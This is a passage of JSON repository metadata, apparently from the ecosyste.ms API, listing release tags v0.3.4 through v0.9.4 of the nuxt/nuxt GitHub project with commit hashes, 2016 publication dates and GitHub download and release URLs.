github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url"